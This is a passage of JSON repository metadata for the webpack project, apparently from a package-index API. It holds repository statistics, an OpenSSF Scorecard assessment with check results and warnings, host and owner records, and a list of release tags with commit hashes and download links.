stuff.","archived":false,"fork":false,"pushed_at":"2026-08-22T00:09:57.000Z","size":95341,"stargazers_count":65973,"open_issues_count":138,"forks_count":9525,"subscribers_count":1466,"default_branch":"main","last_synced_at":"2026-08-22T13:33:37.681Z","etag":null,"topics":["amd","build-tool","commonjs","compiler","es2015","es6","esm","javascript","javascript-compiler","javascript-modules","loaders","module-bundler","plugins","web","web-performance","webpack"],"latest_commit_sha":null,"homepage":"https://webpack.js.org","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/webpack.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":"GOVERNANCE.md","roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":null,"dco":null,"cla":null,"disclosure":null},"funding":{"open_collective":"webpack"}},"created_at":"2012-03-10T10:08:14.000Z","updated_at":"2026-08-22T08:28:27.000Z","dependencies_parsed_at":"2026-08-08T12:34:57.314Z","dependency_job_id":null,"html_url":"https://github.com/webpack/webpack","commit_stats":{"total_commits":12493,"total_committers":934,"mean_commits":"13.375802997858672","dds":0.5586328343872569,"last_synced_commit":"89dfc9a5c575dc691e3ac6a965d39c854fca3986"},"previous_names":[],"tags_count":670,"template":false,"template_full_name":null,"purl":"pkg:github/webpack/webpack","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/sbom","scorecard":{"id":546233,"data":{"date":"2025-07-28","repo":{"name":"github.com/webpack/webpack","commit":"de79ee457eb921e6e1b186c90c65590789a013ca"},"scorecard":{"version":"v5.2.1-26-g4feedb85","commit":"4feedb857ab8d82158aa9774bf8054df41992180"},"score":6,"checks":[{"name":"Code-Review","score":5,"reason":"Found 12/24 approved changesets -- score normalized to 5","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#code-review"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#packaging"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 12 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:6","Info: topLevel 'contents' permission set to 'read': .github/workflows/examples.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:13","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#token-permissions"}},{"name":"Security-Policy","score":9,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Warn: One or no descriptive hints of disclosure, vulnerability, and/or timelines in security policy","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#cii-best-practices"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#branch-protection"}},{"name":"Binary-Artifacts","score":0,"reason":"binaries present in source code","details":["Warn: binary detected: examples/nodejs-addons/file.node:1","Warn: binary detected: examples/wasm-bindgen-esm/pkg/hi_wasm_bg.wasm:1","Warn: binary detected: examples/wasm-simple/add.wasm:1","Warn: binary detected: examples/wasm-simple/factorial.wasm:1","Warn: binary detected: examples/wasm-simple/fibonacci.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory2.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory3.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/other.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/wasm.wasm:1","Warn: binary detected: test/cases/wasm/imports-multiple/wasm.wasm:1","Warn: binary detected: test/cases/wasm/v128/v128.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/testFunction.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/configCases/wasm/externref/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/configCases/wasm/missing-wasm-experiment/wasm.wasm:1","Warn: binary detected: test/configCases/wasm/reference-types/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/0/wasm.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/1/wasm.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/examples.yml:29: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:72: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:77: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:85: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:96: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:98: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:109: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:111: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:118: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:124: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:162: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:163: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:174: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:200: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:207: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Info:   0 out of  22 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 28 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-20T09:35:41.151Z","repository_id":2686067,"created_at":"2025-08-20T09:35:41.151Z","updated_at":"2025-08-20T09:35:41.151Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36825724,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-22T02:00:06.114Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"webpack","name":"webpack","uuid":"2105791","kind":"organization","description":"","email":null,"website":"https://webpack.js.org","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/2105791?v=4","repositories_count":50,"last_synced_at":"2024-10-29T23:38:53.364Z","metadata":{"has_sponsors_listing":false,"funding":{"open_collective":"webpack"}},"html_url":"https://github.com/webpack","funding_links":["https://opencollective.com/webpack"],"total_stars":95072,"followers":924,"following":0,"created_at":"2022-11-02T16:19:08.894Z","updated_at":"2024-10-29T23:38:53.365Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack/repositories"},"tags":[{"name":"v5.109.2","sha":"6a24bd65b72c43207c36ce61b54e1f5833486906","kind":"tag","published_at":"2026-07-28T18:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2/manifests"},{"name":"v5.109.1","sha":"ec3908838175b79c004f61f9bf53d57a6d0e52f8","kind":"tag","published_at":"2026-07-27T21:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1/manifests"},{"name":"v5.109.0","sha":"21cd11a1f53567a42eee3a0be822b968a1ffcb12","kind":"tag","published_at":"2026-07-23T19:19:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0/manifests"},{"name":"v5.108.4","sha":"bb9ccfd32b8059819204a48bdb5436c9266dcdf0","kind":"tag","published_at":"2026-07-04T18:09:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4/manifests"},{"name":"v5.108.3","sha":"6844305fc2d9bceab547b6aae6fcd7ab12d598d8","kind":"tag","published_at":"2026-06-29T22:00:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3/manifests"},{"name":"v5.108.2","sha":"4dfe770e543f8e0c59184b9767e19b604d01af88","kind":"tag","published_at":"2026-06-29T12:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2/manifests"},{"name":"v5.108.1","sha":"da91761ed92c8e133ee321c7db4ad6c4698cae0a","kind":"tag","published_at":"2026-06-26T13:04:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1/manifests"},{"name":"v5.108.0","sha":"322b0603d6cae784063482cdc3cf8ca0b135a422","kind":"tag","published_at":"2026-06-25T09:40:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0/manifests"},{"name":"v5.107.2","sha":"cfb24a4af6ea68034b25f80e14f95aaeaad6d596","kind":"tag","published_at":"2026-05-25T15:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2/manifests"},{"name":"v5.107.1","sha":"a1ce7ebea4069d31ba27da07c07839d9dc1d69d6","kind":"tag","published_at":"2026-05-21T14:29:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1/manifests"},{"name":"v5.107.0","sha":"4657874201bb3a098445fca14e2f271c82a3f91c","kind":"tag","published_at":"2026-05-20T09:40:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0/manifests"},{"name":"v5.106.2","sha":"0d7e3e0153f0696311a590f90620506e8ab166ac","kind":"tag","published_at":"2026-04-15T11:44:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2/manifests"},{"name":"v5.106.1","sha":"a934b9bb0330aba61e759ef943b7303ba305959f","kind":"tag","published_at":"2026-04-10T10:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1/manifests"},{"name":"v5.106.0","sha":"8774a0110bea46f33fd2c504f59e698dbdcf136e","kind":"tag","published_at":"2026-04-08T15:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0/manifests"},{"name":"v5.105.4","sha":"27c13b44c861908793f160f9f7413b32543c0522","kind":"tag","published_at":"2026-03-03T16:29:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4/manifests"},{"name":"v5.105.3","sha":"714a0e3496f2189f76b5d2c98eacdeedae9e7c06","kind":"tag","published_at":"2026-02-26T10:27:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3/manifests"},{"name":"v5.105.2","sha":"0756c7eb697a7759afe081a1fcf8f5481ea06bc3","kind":"tag","published_at":"2026-02-12T15:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2/manifests"},{"name":"v5.105.1","sha":"8e50ef2035b9cb727aeaa97d7561545d1c102b91","kind":"tag","published_at":"2026-02-10T15:01:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1/manifests"},{"name":"v5.105.0","sha":"1486f9aacca11d79dbb7ddbceed29b7e6df7a7ab","kind":"tag","published_at":"2026-02-03T15:30:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0/manifests"},{"name":"v5.104.1","sha":"24e3c2d2c9f8c6d60810302b2ea70ed86e2863dc","kind":"commit","published_at":"2025-12-18T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1/manifests"},{"name":"v5.104.0","sha":"505a5e744fbcf4471ddb534bf1d4aebea9643c1b","kind":"commit","published_at":"2025-12-16T13:03:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0/manifests"},{"name":"v5.103.0","sha":"e0219482aafb9087a50ca0be45110727a33801fb","kind":"commit","published_at":"2025-11-18T11:07:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.103.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.103.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.103.0","tag_url":"https://repos.ecosyste.ms/api/